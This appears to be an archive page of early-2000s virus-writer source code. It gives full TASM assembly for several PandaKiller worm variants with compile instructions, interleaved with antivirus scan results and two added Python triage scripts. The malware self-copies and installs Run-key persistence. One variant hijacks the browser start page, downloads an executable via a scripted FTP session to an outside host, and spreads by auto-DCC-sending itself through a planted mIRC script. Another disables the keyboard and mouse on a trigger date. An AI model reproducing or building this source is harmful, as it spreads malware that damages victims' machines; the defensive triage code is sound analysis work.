File size: 8192 bytes. MD5: 104229b6d583df50db044f0d89fc7db9. SHA1: db05dc880b74d864a8c47d8db22c2847b655c14a.
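The VBScript payloads that the Dwarf and Panda3 binaries above write to disk rely on a small set of Windows Script Host behaviours: a RegWrite into a Run key, a Run entry that shuts Windows down through user.exe,ExitWindows, a self-copy via WScript.ScriptFullName under a double extension, an Internet Explorer Start Page hijack, a payload gated on the date, and a batch file written with CreateTextFile. The Python below is an added triage example for this archive page, not the author's code: it checks a .vbs for those indicators and lists the Run-key entries it would create. The two sample scripts are constructed here from the behaviour of the sources above (with example.invalid in place of the original start page URL); the rule names and the hypothetical functions findings() and run_key_targets() are this example's own. The rules are plain string heuristics, so a script that assembles key names at runtime will slip past them.

```python
"""Static triage of Windows Script Host droppers like the Dwarf and Panda3
payloads above. Added example for this archive page, not the author's code."""
import re
from typing import List, Tuple

# Registry hive spellings that WScript.Shell.RegWrite accepts.
HIVES = r'(?:HKLM|HKEY_LOCAL_MACHINE|HKCU|HKEY_CURRENT_USER)'
RUN_KEY = HIVES + r'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\'

# (finding, regex). VBScript is case-insensitive, so every rule is too.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    # Persistence: RegWrite whose target sits under a Run key.
    ("run-key-persistence", re.compile(r'RegWrite\s+"' + RUN_KEY, re.I)),
    # Dwarf payload: Run entry that shuts Windows down at every logon.
    ("shutdown-at-logon",
     re.compile(r'rundll32(?:\.exe)?\s+[^"]*user\.exe,\s*ExitWindows', re.I)),
    # Panda3: copies the running script elsewhere.
    ("self-copy", re.compile(r'GetFile\(\s*WScript\.ScriptFullName\s*\)', re.I)),
    # Panda3: WSock32.dll.vbs / PandaDwarf.txt.vbs style disguises.
    ("double-extension-drop", re.compile(r'\.(?:dll|txt|jpg|gif|exe)\.vbs\b', re.I)),
    # Panda3: Internet Explorer start page hijack.
    ("start-page-hijack", re.compile(r'Internet Explorer\\Main\\Start Page', re.I)),
    # Dwarf7 / Panda3: payload gated on Day/Month/Year(Now).
    ("date-gated-payload", re.compile(r'\b(?:Day|Month|Year)\s*\(\s*Now\s*\)\s*=', re.I)),
    # Dwarf7: a .bat written with CreateTextFile, even when the path is held
    # in a variable first (two lookaheads over the whole script text).
    ("batch-dropper", re.compile(r'(?=.*CreateTextFile\s*\()(?=.*\.bat\b)', re.I | re.S)),
]

# Value name and command of each Run-key entry a script writes.
RUN_ENTRY = re.compile(r'RegWrite\s+"' + RUN_KEY + r'([^"]+)"\s*,\s*"([^"]*)"', re.I)


def findings(script: str) -> List[str]:
    """Sorted names of every rule that matches the script."""
    return sorted(name for name, rx in RULES if rx.search(script))


def run_key_targets(script: str) -> List[Tuple[str, str]]:
    """(value name, command) for every Run-key entry the script would create."""
    return [(m.group(1), m.group(2)) for m in RUN_ENTRY.finditer(script)]


# Constructed sample: the script Panda3 writes to C:\Salut.vbs, reduced to
# its behaviour, with the start page URL replaced by example.invalid.
PANDA3_SCRIPT = r'''
Set a = CreateObject("Scripting.FileSystemObject")
Set win = a.GetSpecialFolder(0)
Set sys = a.GetSpecialFolder(1)
Set c = a.GetFile(WScript.ScriptFullName)
c.Copy(win&"\WSock32.dll.vbs")
c.Copy(sys&"\PandaDwarf.txt.vbs")
Set W = Wscript.CreateObject("WScript.Shell")
W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://example.invalid/"
W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\StartWindoz", "C:\WINDOWS\SYSTEM\WSock32.dll.vbs"
If Year(Now) = 2001 Then
  W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Stop1", "rundll32,mouse disable"
End If
'''

# Constructed sample: the Panda.vbs payload Dwarf7 drops, same reduction.
DWARF7_SCRIPT = r'''
If Day(Now) = 5 And Month(Now) = 12 Then
Set W=CreateObject("WScript.Shell")
W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DwArF", "C:\WINDOWS\RUNDLL32.EXE %windir%\system\user.exe,Exitwindows"
Set X=CreateObject("Scripting.FileSystemObject")
file="C:\autoexe.bat"
Set O=X.CreateTextFile(file, True, False)
O.Writeline "@echo off"
End If
'''

if __name__ == "__main__":
    for label, text in (("Panda3", PANDA3_SCRIPT), ("Dwarf7", DWARF7_SCRIPT)):
        print(label, findings(text))
        for name, cmd in run_key_targets(text):
            print("  Run\\%s = %s" % (name, cmd))
```

Running it prints five findings for the Panda3 script and four for the Dwarf7 one, together with the Run entries each would install; the value names and commands are what an incident responder would look for under HKLM\...\Run on a suspected machine.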
comment $
W32.PandaKiller.A by PandaKiller, October 12th 2000

CREATES TWO DIRECTORIES:
 - C:\PandaKiller
 - %windir%\Panda

COPIES ITSELF TO:
 - %windir%\Pandakiller.exe
 - %windir%\Panda\Stages.exe
 - %system%\Monopoly.exe

DESCRIPTION:
In C:\PandaKiller it creates the file "EMail.txt", in which it writes an email address where we can be contacted, together with a copyright notice. It displays a message and swaps the mouse buttons if you click "Retry", and it also changes the registered owner name to PandaKiller.

TO COMPILE:
tasm32 /M /ML PandaKiller.asm
tlink32 -Tpe -x -aa PandaKiller.obj,,,import32

Links: www.coderz.net/matrix www.matrixvx.org www.coderz.net
$
        .386p
        locals
        jumps
        .model flat

extrn CreateDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetModuleHandleA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn lstrcat:PROC
extrn MessageBoxA:PROC
extrn SwapMouseButton:PROC
extrn ExitProcess:PROC

        .data
moi     dd 260 dup (0)
targ1   dd 260 dup (0)
targ10  dd 260 dup (0)
fh      dd 0
octets  dd 0
l       dd 0
p       dd 0
CLE     db "\Software\Microsoft\Windows\CurrentVersion",00h
DONNEE  db "PandaKiller",00h
NOM     db "RegisteredOwner",00h
rep1    db "C:\PandaKiller",00h
rep2    db "\Panda",00h
copie1  db "\PandaKiller.exe",00h
copie2  db "\Monopoly.exe",00h
copie3  db "\Panda\Stages.exe",00h
fichier db "\PandaKiller\EMail.txt",00h

TITRE   db "Par PandaKiller le 12/10/00",00h
TEXTE   db "****************************",10,13
        db "Ce fichier n'est pas valide!",10,13
        db "****************************",00h

TXT     db "[PandaKiller]",0dh,0ah
        db "Pour tout contact : [email protected]",0dh,0ah
        db "VBS/LoveLetter.A",0dh,0ah
        db "VBS/IE55",0dh,0ah
        db "W32.Happy99",0dh,0ah
        db "I-Worm/Kak.A",0dh,0ah
        db "W32.PandaKiller.A par PandaKiller (c)2000",00h
taille  equ $-TXT

        .code
DEBUT:
CREER_REPERTOIRE:
        push 00000000h
        push offset rep1
        call CreateDirectoryA   ; C:\Pandakiller
        push 260
        push offset targ1
        call GetWindowsDirectoryA
        push offset rep2
        push offset targ1
        call lstrcat
        push offset targ1
        call CreateDirectoryA   ; %windir%\Panda

AUTO_COPIE:
        push 00000000h
        call GetModuleHandleA
        push 260
        push offset moi
        push eax
        call GetModuleFileNameA ; path of the running executable
        push 260
        push offset targ1
        call GetWindowsDirectoryA
        push offset copie1
        push offset targ1
        call lstrcat
        push 00000000h
        push offset targ1
        push offset moi
        call CopyFileA          ; %windir%\PandaKiller.exe
        push 260
        push offset targ1
        call GetSystemDirectoryA
        push offset copie2
        push offset targ1
        call lstrcat
        push 00000000h
        push offset targ1
        push offset moi
        call CopyFileA          ; %system%\Monopoly.exe

        push 260
        push offset targ10
        call GetWindowsDirectoryA
        push offset copie3
        push offset targ10
        call lstrcat
        push 00000000h
        push offset targ10
        push offset targ1
        call CopyFileA          ; %windir%\Panda\Stages.exe

FICHIER_TEXTE:
        push 00000000h
        push 00000080h          ; FILE_ATTRIBUTE_NORMAL
        push 00000002h          ; CREATE_ALWAYS
        push 00000000h
        push 00000001h          ; FILE_SHARE_READ
        push 40000000h          ; GENERIC_WRITE
        push offset fichier
        call CreateFileA
        mov [fh],eax
        push 00h
        push offset octets
        push taille
        push offset TXT
        push [fh]
        call WriteFile
        push [fh]
        call CloseHandle

REGISTRE:
        push offset p           ; phkResult
        push 0
        push 1F0000h + 1 + 2h   ; STANDARD_RIGHTS_ALL | KEY_QUERY_VALUE | KEY_SET_VALUE
        push 0
        push 0
        push 0
        push offset CLE
        push 80000002h          ; HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push 05h                ; cbData
        push offset DONNEE      ; "PandaKiller"
        push 01h                ; REG_SZ
        push 0
        push offset NOM         ; into RegisteredOwner
        push p
        call RegSetValueExA     ; set the registry value
        push 0
        call RegCloseKey        ; close the registry key

MESSAGE:
        push 35h                ; MB_RETRYCANCEL | MB_ICONEXCLAMATION
        push offset TITRE
        push offset TEXTE
        push 00h
        call MessageBoxA
        cmp eax,4               ; IDRETRY?
        jne FIN

SOURIS:
        push 01h
        call SwapMouseButton    ; swap left and right mouse buttons
        jmp MESSAGE

FIN:
        push 0
        call ExitProcess
        end DEBUT

Multi-engine scan result for W32PKa.exe, file received on 05.16.2009 10:40:20 (CET): 7 of 40 engines flagged the file, all but one by heuristics.
  Authentium 5.1.2.4 (2009.05.15): W32/Heuristic-131!Eldorado
  F-Prot 4.4.4.56 (2009.05.15): W32/Heuristic-131!Eldorado
  F-Secure 8.0.14470.0 (2009.05.15): Suspicious:W32/Malware!Gemini
  Kaspersky 7.0.0.125 (2009.05.16): Heur.Worm.Generic
  NOD32 4080 (2009.05.15): probably unknown NewHeur_PE
  Sunbelt 3.2.1858.2 (2009.05.16): BehavesLike.Win32.Malware (v)
  Symantec 1.4.4.12 (2009.05.16): W95.Pet_Tick.gen
No detection (signatures dated 2009.05.08 to 2009.05.16): a-squared, AhnLab-V3, AntiVir, Antiy-AVL, Avast, AVG, BitDefender, CAT-QuickHeal, ClamAV, Comodo, DrWeb, eSafe, eTrust-Vet, Fortinet, GData, Ikarus, K7AntiVirus, McAfee, McAfee+Artemis, McAfee-GW-Edition, Microsoft, Norman, nProtect, Panda, PCTools, Prevx, Rising, Sophos, TheHacker, TrendMicro, VBA32, ViRobot, VirusBuster.
File size: 8192 bytes. MD5: 711f77c3a07ea085bee6c1bfa884f012. SHA1: 3cd6512c587c3b0292264177f3d538aa6e9c6965.
W32.PandaKiller.B par PandaKiller le 14 octobre 2000
S'AUTO-COPIE DANS : - %windir%\WinExec.exe
DESCRIPTION:
Ce programme modifie le nom d'enregistrement en PandaKiller. Il se copie dans %windir% (Dossier WINDOWS) et modifie la page de d‚marrage d'Internet. Il cr‚e ensuite trois fichiers : - FTP.DRV : ce fichier va se connecter par FTP et t‚l‚charger un programme qui est KILL_CIH.EXE (un programme contre CIH) - FTP.BAT : il va ‚x‚cuter FTP.DRV - MIRC.EKP : un script pour mIRC qui permet une autoprobagation du fichier. A la connection, il active FTP.BAT et cope WINEXEC.EXE en PICTURE.EXE. Quand quelqu'un arrive, il lui envoie PICTURE.EXE *worm* il envoie ‚galement PICTURE.EXE *KKK* : d‚connecte *White Power* : ‚teint le programme *hitler* : efface Regedit.exe
POUR COMPILER: tasm32 /M /ML PandaKiller2.asm tlink32 -Tpe -x -aa PandaKiller2.obj,,,import32
Lien : www.coderz.net/matrix www.matrixvx.org www.coderz.net $ .386p locals jumps .model flat extrn RegCreateKeyExA:PROC extrn RegSetValueExA:PROC extrn RegCloseKey:PROC extrn GetWindowsDirectoryA:PROC extrn GetModuleHandleA:PROC extrn GetModuleFileNameA:PROC extrn CopyFileA:PROC extrn lstrcat:PROC extrn CreateFileA:PROC extrn WriteFile:PROC extrn CloseHandle:PROC extrn WinExec:PROC extrn CreateDirectoryA:PROC extrn ExitProcess:PROC
.data
moi     dd 260 dup (0)
targ1   dd 260 dup (0)
fh      dd 0
octets  dd 0
l       dd 0
p       dd 0
CLE     db "\Software\Microsoft\Windows\CurrentVersion",00h
DONNEE  db "PandaKiller",00h
NOM     db "RegisteredOwner",00h
CLE2    db "\Software\Microsoft\Internet Explorer\Main",00h
DONNEE2 db "http://kadosh.multimania.com",00h
NOM2    db "Start Page",00h
CLE3    db "\Software\Microsoft\Windows\CurrentVersion\Run",00h
DONNEE3 db "C:\Win\kill_cih.exe",00h
NOM3    db "killcih",00h
copie1  db "\WinExec.exe",00h
dossier db "C:\Win",00h
bat     db "C:\Win\ftp.bat",00h
drv     db "C:\Win\ftp.drv",00h
ini     db "C:\Win\mirc.ekp",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h

batd    db "@echo off",0dh,0ah
        db "start ftp -i -v -s:C:\Win\ftp.drv",00h
batsize equ $-batd

drvd    db "open",0dh,0ah
        db "members.aol.com",0dh,0ah
        db "pentasm99",0dh,0ah
        db "cd Panda",0dh,0ah
        db "binary",0dh,0ah
        db "lcd C:\Win",0dh,0ah
        db "get kill_cih.exe",0dh,0ah
        db "bye",0dh,0ah
        db "exit",0dh,0ah
drvsize equ $-drvd

inid    db "[SCRIPT]",0dh,0ah
        db "n1=on 1:start:{",0dh,0ah
        db "n2=.remote on",0dh,0ah
        db "n3=.ctcps on",0dh,0ah
        db "n4=.events on",0dh,0ah
        db "n5=}",0dh,0ah
        db "n6=on 1:connect:{",0dh,0ah
        db "n7= /.copy -0 C:\Windows\WinExec.exe C:\Picture.exe",0dh,0ah
        db "n8= /.run -n C:\command.com start C:\Win\ftp.bat",0dh,0ah
        db "n9=on 1:join:#:{",0dh,0ah
        db "n10=if ( $nick == $ma ) {halt } .dcc send $nick C:\Picture.exe",0dh,0ah
        db "n11=}",0dh,0ah
        db "n12=on 1:text:*worm*:{",0dh,0ah
        db "n13=if ( $nick == $ma ) {halt } .dcc send $nick C:\Picture.exe",0dh,0ah
        db "n14=}",0dh,0ah
        db "n15=on 1:text:*KKK*:/disconnect",0dh,0ah
        db "n16=on 1:text:*white power*:/exit",0dh,0ah
        db "n17=on 1:text:*hitler*:/remove C:\Windows\regedit.exe",0dh,0ah
inisize equ $-inid

.code
REGISTRE:
        push offset l
        push offset p
        push 0
        push 1F0000h + 1 + 2h
        push 0
        push 0
        push 0
        push offset CLE
        push 80000002h          ;HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push 05h
        push offset DONNEE      ;PandaKiller
        push 01h
        push 0
        push offset NOM         ;into RegisteredOwner
        push p
        call RegSetValueExA     ;CREATES A VALUE
        push 0
        call RegCloseKey        ;CLOSES THE REGISTRY

AUTO_COPIE:
        push 00000000h
        call GetModuleHandleA
        push 260
        push offset moi
        push eax
        call GetModuleFileNameA
        push 260
        push offset targ1
        call GetWindowsDirectoryA
        push offset copie1
        push offset targ1
        call lstrcat
        push 00000000h
        push offset targ1
        push offset moi
        call CopyFileA          ;%windir%\WinExec.exe

CREER_DOSSIER:
        push 00000000h
        push offset dossier
        call CreateDirectoryA   ;C:\Win

REGISTRE2:
        push offset l
        push offset p
        push 0
        push 1F0000h + 1 + 2h
        push 0
        push 0
        push 0
        push offset CLE2
        push 80000001h          ;HKEY_CURRENT_USER
        call RegCreateKeyExA
        push 05h
        push offset DONNEE2     ;kadosh.multimania.com
        push 01h
        push 0
        push offset NOM2        ;Start Page
        push p
        call RegSetValueExA     ;CREATES A VALUE
        push 0
        call RegCloseKey        ;CLOSES THE REGISTRY
        push offset l
        push offset p
        push 0
        push 1F0000h + 1 + 2h
        push 0
        push 0
        push 0
        push offset CLE3
        push 80000002h          ;HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push 05h
        push offset DONNEE3     ;C:\Win\kill_cih.exe
        push 01h
        push 0
        push offset NOM3        ;killcih
        push p
        call RegSetValueExA     ;CREATES A VALUE
        push 0
        call RegCloseKey        ;CLOSES THE REGISTRY

FICHIER:
        push 00000000h
        push 00000080h
        push 00000002h
        push 00000000h
        push 00000001h
        push 40000000h
        push offset bat
        call CreateFileA
        mov [fh],eax
        push 00h
        push offset octets
        push batsize
        push offset batd
        push [fh]
        call WriteFile
        push [fh]
        call CloseHandle

        push 00000000h
        push 00000080h
        push 00000002h
        push 00000000h
        push 00000001h
        push 40000000h
        push offset drv
        call CreateFileA
        mov [fh],eax
        push 00h
        push offset octets
        push drvsize
        push offset drvd
        push [fh]
        call WriteFile
        push [fh]
        call CloseHandle

        push 00000000h
        push 00000080h
        push 00000002h
        push 00000000h
        push 00000001h
        push 40000000h
        push offset ini
        call CreateFileA
        mov [fh],eax
        push 00h
        push offset octets
        push inisize
        push offset inid
        push [fh]
        call WriteFile
        push [fh]
        call CloseHandle

COPIE_MIRC:
        push 00000000h
        push offset script1
        push offset ini
        call CopyFileA
        push 00000000h
        push offset script2
        push offset ini
        call CopyFileA
        push 00000000h
        push offset script3
        push offset ini
        call CopyFileA
        push 00000000h
        push offset script4
        push offset ini
        call CopyFileA

WinExecBat:
        push 1
        push offset bat
        call WinExec
FIN:
        push 0
        call ExitProcess
end REGISTRE

File W32PKb.exe received on 05.16.2009 10:41:58 (CET)
Antivirus          Version          Last Update   Result
a-squared          4.0.0.101        2009.05.16    -
AhnLab-V3          5.0.0.2          2009.05.15    -
AntiVir            7.9.0.168        2009.05.15    HEUR/Malware
Antiy-AVL          2.0.3.1          2009.05.15    -
Authentium         5.1.2.4          2009.05.15    -
Avast              4.8.1335.0       2009.05.15    -
AVG                8.5.0.336        2009.05.15    -
BitDefender        7.2              2009.05.16    Generic.Malware.SIsp!.664610C1
CAT-QuickHeal      10.00            2009.05.15    -
ClamAV             0.94.1           2009.05.15    -
Comodo             1157             2009.05.08    -
DrWeb              5.0.0.12182      2009.05.16    Trojan.MulDrop.origin
eSafe              7.0.17.0         2009.05.14    -
eTrust-Vet         31.6.6508        2009.05.16    -
F-Prot             4.4.4.56         2009.05.15    -
F-Secure           8.0.14470.0      2009.05.15    W32/P2PWorm
Fortinet           3.117.0.0        2009.05.16    -
GData              19               2009.05.16    Generic.Malware.SIsp!.664610C1
Ikarus             T3.1.1.49.0      2009.05.16    -
K7AntiVirus        7.10.735         2009.05.14    -
Kaspersky          7.0.0.125        2009.05.16    Heur.StartPage
McAfee             5616             2009.05.15    New Malware.b
McAfee+Artemis     5616             2009.05.15    New Malware.b
McAfee-GW-Edition  6.7.6            2009.05.15    Heuristic.Malware
Microsoft          1.4602           2009.05.16    -
NOD32              4080             2009.05.15    probably unknown NewHeur_PE
Norman             6.01.05          2009.05.16    W32/P2PWorm
nProtect           2009.1.8.0       2009.05.16    -
Panda              10.0.0.14        2009.05.15    Suspicious file
PCTools            4.4.2.0          2009.05.15    IRC.Sensi.B
Prevx              3.0              2009.05.16    -
Rising             21.29.51.00      2009.05.16    -
Sophos             4.41.0           2009.05.16    -
Sunbelt            3.2.1858.2       2009.05.16    BehavesLike.Win32.Malware (v)
Symantec           1.4.4.12         2009.05.16    W95.Pet_Tick.gen
TheHacker          6.3.4.1.326      2009.05.15    -
TrendMicro         8.950.0.1092     2009.05.15    -
VBA32              3.12.10.5        2009.05.16    -
ViRobot            2009.5.15.1737   2009.05.15    -
VirusBuster        4.6.5.0          2009.05.15    IRC.Sensi.B
Additional information
File size: 8192 bytes
MD5...: 58c6c31028ac1b84cc73eb13300f21da
SHA1..: a73cf795bc76385b71158a64cc770a813b399b74

comment $
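As an added example (not code from the archive or its author), the checker below triages a mIRC script.ini for the worm-style handlers that the PandaKiller.B description lists: auto-DCC-send on join or on a keyword, dropper launch on connect, and keyword-triggered disconnect, exit and file deletion. The script sample, the benign control and every function name are constructed for this example, modelled on the mirc.ekp layout above; matching is a substring heuristic, not a full mIRC parser.

```python
"""Added example (not from the archive): heuristic triage of a mIRC
script.ini for worm-style handlers.  All names are this example's own."""
import re

# Command fragment -> indicator label.  Commands are lower-cased and the
# "/" and "." prefixes mIRC accepts are stripped before matching.
INDICATORS = {
    "dcc send":   "auto_dcc_send",      # pushes a file to another user
    "remove ":    "deletes_file",       # /remove <file>
    "run ":       "runs_external",      # /run <program> (dropper launch)
    "copy ":      "copies_file",        # /copy <src> <dst> (stages payload)
    "disconnect": "forced_disconnect",
    "exit":       "forced_exit",
}
LINE_RE = re.compile(r"^n\d+=(.*)$", re.I)                     # n7=<content>
ON_RE = re.compile(r"^on\s+\S+?:(?P<event>[a-z]+):(?P<rest>.*)$", re.I)

def script_lines(text: str) -> list:
    """Content of the nN= lines found inside [script] sections."""
    out, in_script = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_script = line.lower() == "[script]"
            continue
        m = LINE_RE.match(line)
        if in_script and m:
            out.append(m.group(1).strip())
    return out

def parse_handlers(text: str) -> list:
    """Split the script into {"event", "trigger", "commands"} handlers.  A new
    "on" line always opens a handler, so a block whose closing brace is
    missing (as in the dropped script above) is still delimited."""
    handlers, current = [], None
    for line in script_lines(text):
        m = ON_RE.match(line)
        if m:
            current = {"event": m.group("event").lower(), "trigger": "", "commands": []}
            handlers.append(current)
            parts = m.group("rest").split(":")
            for i, part in enumerate(parts):
                p = part.strip()
                if p == "{":                              # multi-line body follows
                    break
                # Assumption: a command starts with "/" or "." or contains a
                # space; anything before it ("#", "*word*") is the trigger.
                if p.startswith(("/", ".")) or " " in p:
                    current["commands"].append(":".join(parts[i:]).strip())
                    break
                current["trigger"] = current["trigger"] or p
        elif current is not None and line != "}":
            current["commands"].append(line)
    return handlers

def triage(text: str) -> list:
    """One finding per (handler command, indicator) match, in script order."""
    findings = []
    for h in parse_handlers(text):
        for cmd in h["commands"]:
            norm = cmd.lower().lstrip("/.")               # "/.dcc send" -> "dcc send"
            for fragment, label in INDICATORS.items():
                # A non-letter must precede the fragment: ".remote on" must not
                # match "remove " and "texit" must not match "exit".
                if re.search(r"(?<![a-z])" + re.escape(fragment), norm):
                    findings.append({"event": h["event"], "trigger": h["trigger"],
                                     "indicator": label, "command": cmd})
    return findings

def is_dcc_spreader(text: str) -> bool:
    """True when a join or text handler DCC-sends a file (the IRC propagation
    pattern the droppers in this archive share)."""
    return any(f["indicator"] == "auto_dcc_send" and f["event"] in ("join", "text")
               for f in triage(text))

# Constructed sample, modelled on the mirc.ekp layout above; the "connect"
# block deliberately lacks its closing brace, as the original does.
SAMPLE = r"""[SCRIPT]
n1=on 1:start:{
n2=.remote on
n3=}
n4=on 1:connect:{
n5= /.copy -0 C:\Windows\WinExec.exe C:\Picture.exe
n6= /.run -n C:\command.com start C:\Win\ftp.bat
n7=on 1:join:#:{
n8=if ( $nick == $me ) { halt } .dcc send $nick C:\Picture.exe
n9=}
n10=on 1:text:*pic*:{
n11=if ( $nick == $me ) { halt } .dcc send $nick C:\Picture.exe
n12=}
n13=on 1:text:*bye*:/disconnect
n14=on 1:text:*reg*:/remove C:\Windows\regedit.exe
"""
# Constructed benign script: greets joiners and answers a keyword.
BENIGN = """[script]
n0=on 1:join:#:/msg $nick Welcome to $chan
n1=on 1:text:*help*:#:/notice $nick Type !rules
"""
```

Running `triage(SAMPLE)` yields one finding per flagged command in script order, and `is_dcc_spreader` is true for the sample and false for the benign script.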
W32.PandaKiller.C by PandaKiller, 17 October 2000

COPIES ITSELF TO: - %windir%\WinExec.exe

DESCRIPTION:
 - 5/12: sets the registered-owner name to PandaKiller
 - 2001: disables the keyboard and the mouse

TO COMPILE:
tasm32 /M /ML PandaKiller3.asm
tlink32 -Tpe -x -aa PandaKiller3.obj,,,import32
$

jumps
locals
.386
.model flat

extrn GetModuleHandleA:PROC
extrn GetModuleFileNameA:PROC
extrn GetWindowsDirectoryA:PROC
extrn CopyFileA:PROC
extrn lstrcat:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn GetSystemTime:PROC
extrn MessageBoxA:PROC
extrn ExitProcess:PROC

.data
moi     dd 260 dup (0)
targ1   dd 260 dup (0)
copie   db "\WinExec.exe",00h
l       dd 0
p       dd 0
CLE     db "\Software\Microsoft\Windows\CurrentVersion",00h
DONNEE  db "PandaKiller",00h
NOM     db "RegisteredOwner",00h
CLE2    db "\Software\Microsoft\Windows\CurrentVersion\Run",00h
DONNEE2 db "%windir%\WinExec.exe",00h
NOM2    db "WinExec",00h
DONNEE3 db "rundll32 mouse,disable",00h
NOM3    db "Stop1",00h
DONNEE4 db "rundll32 keyboard,disable",00h
NOM4    db "Stop2",00h
TITRE   db "T.PK.3",00h
TEXTE   db "VOUS SOUHAITE UNE BONNE ANNEE !",00h

SYSTIME struct
        wYear         WORD ?
        wMonth        WORD ?
        wDayOfWeek    WORD ?
        wDay          WORD ?
        wHour         WORD ?
        wMinute       WORD ?
        wsecond       WORD ?
        wMilliseconds WORD ?
SYSTIME ends
SystemTime SYSTIME <>

.code
DEBUT:
AUTO_COPIE:
        push 00000000h
        call GetModuleHandleA
        push 260
        push offset moi
        push eax
        call GetModuleFileNameA
        push 260
        push offset targ1
        call GetWindowsDirectoryA
        push offset copie
        push offset targ1
        call lstrcat
        push 00000000h
        push offset targ1
        push offset moi
        call CopyFileA          ;%windir%\WinExec.exe

        push offset l
        push offset p
        push 0
        push 1F0000h + 1 + 2h
        push 0
        push 0
        push 0
        push offset CLE2
        push 80000002h          ;HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push 05h
        push offset DONNEE2     ;%windir%\WinExec.exe
        push 01h
        push 0
        push offset NOM2
        push p
        call RegSetValueExA     ;CREATES A VALUE
        push 0
        call RegCloseKey        ;CLOSES THE REGISTRY

HEURE:
        push offset SystemTime
        call GetSystemTime
        cmp [SystemTime.wMonth],0Ch
        jne HEURE2
        cmp [SystemTime.wDay],05h
        jne HEURE2

REGISTRE:
        push offset l
        push offset p
        push 0
        push 1F0000h + 1 + 2h
        push 0
        push 0
        push 0
        push offset CLE
        push 80000002h          ;HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push 05h
        push offset DONNEE      ;PandaKiller
        push 01h
        push 0
        push offset NOM         ;into RegisteredOwner
        push p
        call RegSetValueExA     ;CREATES A VALUE
        push 0
        call RegCloseKey        ;CLOSES THE REGISTRY

HEURE2:
        push offset SystemTime
        call GetSystemTime
        cmp [SystemTime.wYear],7D1h
        jne FIN

REGISTRE2:
        push offset l
        push offset p
        push 0
        push 1F0000h + 1 + 2h
        push 0
        push 0
        push 0
        push offset CLE2
        push 80000002h          ;HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push 05h
        push offset DONNEE3     ;mouse,disable
        push 01h
        push 0
        push offset NOM3
        push p
        call RegSetValueExA     ;CREATES A VALUE
        push offset l
        push offset p
        push 0
        push 1F0000h + 1 + 2h
        push 0
        push 0
        push 0
        push offset CLE2
        push 80000002h          ;HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push 05h
        push offset DONNEE4     ;keyboard,disable
        push 01h
        push 0
        push offset NOM4
        push p
        call RegSetValueExA     ;CREATES A VALUE
        push 0
        call RegCloseKey
MESSAGE:
        push 40h
        push offset TITRE
        push offset TEXTE
        push 0
        call MessageBoxA

FIN:
        push 0
        call ExitProcess
end DEBUT

File W32PKc.exe received on 05.16.2009 10:42:04 (CET)
Antivirus          Version          Last Update   Result
a-squared          4.0.0.101        2009.05.16    -
AhnLab-V3          5.0.0.2          2009.05.15    -
AntiVir            7.9.0.168        2009.05.15    -
Antiy-AVL          2.0.3.1          2009.05.15    -
Authentium         5.1.2.4          2009.05.15    -
Avast              4.8.1335.0       2009.05.15    -
AVG                8.5.0.336        2009.05.15    BAT/Generic
BitDefender        7.2              2009.05.16    -
CAT-QuickHeal      10.00            2009.05.15    -
ClamAV             0.94.1           2009.05.15    -
Comodo             1157             2009.05.08    -
DrWeb              5.0.0.12182      2009.05.16    Trojan.DownLoader.origin
eSafe              7.0.17.0         2009.05.14    -
eTrust-Vet         31.6.6508        2009.05.16    -
F-Prot             4.4.4.56         2009.05.15    -
F-Secure           8.0.14470.0      2009.05.15    Suspicious:W32/Malware!Gemini
Fortinet           3.117.0.0        2009.05.16    -
GData              19               2009.05.16    -
Ikarus             T3.1.1.49.0      2009.05.16    -
K7AntiVirus        7.10.735         2009.05.14    -
Kaspersky          7.0.0.125        2009.05.16    -
McAfee             5616             2009.05.15    -
McAfee+Artemis     5616             2009.05.15    -
McAfee-GW-Edition  6.7.6            2009.05.15    -
Microsoft          1.4602           2009.05.16    -
NOD32              4080             2009.05.15    probably unknown NewHeur_PE
Norman             6.01.05          2009.05.16    -
nProtect           2009.1.8.0       2009.05.16    -
Panda              10.0.0.14        2009.05.15    Suspicious file
PCTools            4.4.2.0          2009.05.15    -
Prevx              3.0              2009.05.16    -
Rising             21.29.51.00      2009.05.16    -
Sophos             4.41.0           2009.05.16    -
Sunbelt            3.2.1858.2       2009.05.16    BehavesLike.Win32.Malware (v)
Symantec           1.4.4.12         2009.05.16    -
TheHacker          6.3.4.1.326      2009.05.15    -
TrendMicro         8.950.0.1092     2009.05.15    -
VBA32              3.12.10.5        2009.05.16    -
ViRobot            2009.5.15.1737   2009.05.15    -
VirusBuster        4.6.5.0          2009.05.15    -
Additional information
File size: 8192 bytes
MD5...: a133a8af3b031045bd0ae4c7d9fa4210
SHA1..: d3481290f42e9f1485d7d9cdc5184159e5272297

comment $
W95/98.PandaKiller by PandaKiller, 1 November 2000

TO COMPILE:
tasm32 /M /ML ?????.asm
tlink32 -Tpe -x -aa ?????.obj,,,import32
$
.386
jumps
locals
.model flat, stdcall

;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
